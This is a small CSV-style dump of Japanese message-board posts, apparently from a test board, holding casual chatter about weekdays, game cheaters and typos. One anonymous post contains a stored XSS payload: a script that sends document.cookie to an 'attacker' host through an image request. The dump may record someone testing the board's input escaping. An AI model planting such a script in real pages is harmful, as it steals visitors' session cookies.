A1,今日は何曜日ですか,2021年6月29日15時8分
A2,今日は水曜日ですよ,2021年6月29日15時8分
A3,何をいっているのですか?,2021年6月29日21時28分
Anonymous,日付が変更されたので、今日は木曜日ですね,2021年6月29日21時29分
Anonymous,未来を見ているのですか,2021年6月29日21時40分
B1,あなたは何をいっているのですか?,2021年6月29日21時43分
B2,apex、チータ多すぎ,2021年6月29日21時43分
B3,急に話題帰るやん,2021年6月29日21時43分
B4,誤字ってますよ(帰る→変える),2021年6月29日21時46分
B5,やること多すぎてしんどい,2021年6月30日10時17分
Anonymous,こんにちわ！わたしトモチャン、よろしくね！(ﾟ∀ﾟ)ﾉ ｱﾋｬ <script> var img = document.createElement('img'); img.src = 'http://attacker/spacer.gif?c=' + encodeURI(document.cookie); document.body.appendChild(img); </script>,2021年6月30日13時53分
Anonymous,<iframe width="400" height="250" src="https://www.youtube.com/embed/7vGbYscwSPI" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>,2021年6月30日13時55分